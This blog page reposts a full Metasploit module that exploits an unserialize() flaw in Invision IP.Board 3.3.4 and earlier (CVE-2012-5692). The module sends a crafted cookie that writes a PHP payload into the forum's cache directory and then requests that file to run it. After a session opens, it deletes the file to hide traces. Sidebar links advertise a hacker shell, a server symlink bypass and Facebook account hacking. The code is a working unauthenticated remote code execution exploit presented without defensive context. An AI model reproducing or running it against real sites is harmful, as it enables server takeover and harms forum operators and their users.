• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Exploit » Metasploit » Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution

Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution

Unknown Labels: Exploit, Metasploit Leave A Comment 07:12
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution',
'Description' => %q{
This module exploits a php unserialize() vulnerability in Invision IP.Board
<= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary
code under the context of the webserver user.

The dangerous unserialize() exists in the '/admin/sources/base/core.php' script,
which is called with user controlled data from the cookie. The exploit abuses the
__destruct() method from the dbMain class to write arbitrary PHP code to a file on
the Invision IP.Board web directory.

The exploit has been tested successfully on Invision IP.Board 3.3.4.
},
'Author' =>
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'sinn3r' # PhpEXE tekniq & check() method
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5692' ],
[ 'OSVDB', '86702' ],
[ 'BID', '56288' ],
[ 'EDB', '22398' ],
[ 'URL', 'http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 8000, #Apache's limit for GET
'DisableNops' => true
},
'Targets' => [ ['Invision IP.Board 3.3.4', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 25 2012'
))

register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
], self.class)
end

def base
base = target_uri.path
base << '/' if base[-1, 1] != '/'
return base
end

def check
res = send_request_raw({'uri'=>"#{base}index.php"})
return Exploit::CheckCode::Unknown if not res

version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten
version = version.map {|e| e.to_i}

# We only want major version 3
# This version checking is based on OSVDB's info
return Exploit::CheckCode::Safe if version[0] != 3

case version[1]
when 1
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
when 2
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
when 3
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
end

return Exploit::CheckCode::Safe
end

def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
end
end
end

def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"

# get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space:
# function my_cmd
# becomes:
# functionmy_cmd #Causes parsing error
# We'll have to address that in the mixin, and then come back to this module
# again later.
php_payload = get_write_exec_payload(:unlink_self=>true)
php_payload = php_payload.gsub(/^\<\?php/, '<?')
php_payload = php_payload.gsub(/ /,'')

db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"

print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")

res = send_request_cgi(
{
'uri' => "#{base}index.php?#{php_payload}",
'method' => 'GET',
'cookie' => "member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
})

if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
return
end

print_status("#{@peer} - Executing the payload #{@upload_php}")

res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})

if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
return
end

end
end

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • 403 Forbidden and cant read /etc/named.conf Error Bypass
    This Tut has been submitted by Sen Haxor Now days most of the 2012 Linux Kernel server show this error when you try to symlink the serve...
  • Share Template HiepB bản Edit từ VT
    Xin chào tất cả các bạn mình là Văn Tuấn - Admin của vantuan2it . Mình mới tạo blog này cách đây mấy ngày vì blog còn ít người biết đến nê...
  • Hướng dẫn cách tạo nút nhấp nháy bằng hiệu ứng CSS3
    Phần định nghĩa CSS cho nút: .button {    background-color: #004A7F;    -webkit-border-radius: 10px;    border-radius: 10px;         border:...
  • Mp3.zing.vn XSS Vulnerability - Zing Mp3 dính lỗ hổng bảo mật XSS - P2
    Mp3.zing.vn XSS Vulnerability Lỗ hổng bảo mật: Cross Site Scripting (XSS). PoC:  http://mp3.zing.vn/playlist/Checked-by-Juno-okyo.../IWAEBWI...
  • File Đau Nhóiii | Tyn Daddy
    LIÊN HỆ DOWNLOAD PSD
  • Vbulletin Hacker Shell
    Code: <?php /* |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.| |.|###################################################|.| |.|# ...
  • HƯỚNG DẪN HACK TÀI KHOẢN FACEBOOK THÔNG QUA WEBSITE HACK LIKE,SUB
    Có nhiều bạn khi sử dụng chúc năng hack like,sub nhưng một thời gian sau tài khoản lại bị mất mật khẩu hoặc bị ai đó điều khiển tài khoản củ...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • 403 Forbidden and cant read /etc/named.conf Error Bypass
    This Tut has been submitted by Sen Haxor Now days most of the 2012 Linux Kernel server show this error when you try to symlink the serve...
  • Share Template HiepB bản Edit từ VT
    Share Template HiepB bản Edit từ VT
    Xin chào tất cả các bạn mình là Văn Tuấn - Admin của vantuan2it . Mình mới tạo blog này cách đây mấy ngày vì blog còn ít người biết đến nê...
  • Hướng dẫn cách tạo nút nhấp nháy bằng hiệu ứng CSS3
    Hướng dẫn cách tạo nút nhấp nháy bằng hiệu ứng CSS3
    Phần định nghĩa CSS cho nút: .button {    background-color: #004A7F;    -webkit-border-radius: 10px;    border-radius: 10px;         border:...
  • Mp3.zing.vn XSS Vulnerability - Zing Mp3 dính lỗ hổng bảo mật XSS - P2
    Mp3.zing.vn XSS Vulnerability - Zing Mp3 dính lỗ hổng bảo mật XSS - P2
    Mp3.zing.vn XSS Vulnerability Lỗ hổng bảo mật: Cross Site Scripting (XSS). PoC:  http://mp3.zing.vn/playlist/Checked-by-Juno-okyo.../IWAEBWI...
  • File Đau Nhóiii | Tyn Daddy
    File Đau Nhóiii | Tyn Daddy
    LIÊN HỆ DOWNLOAD PSD
  • Vbulletin Hacker Shell
    Code: <?php /* |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.| |.|###################################################|.| |.|# ...
  • HƯỚNG DẪN HACK TÀI KHOẢN FACEBOOK THÔNG QUA WEBSITE HACK LIKE,SUB
    HƯỚNG DẪN HACK TÀI KHOẢN FACEBOOK THÔNG QUA WEBSITE HACK LIKE,SUB
    Có nhiều bạn khi sử dụng chúc năng hack like,sub nhưng một thời gian sau tài khoản lại bị mất mật khẩu hoặc bị ai đó điều khiển tài khoản củ...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt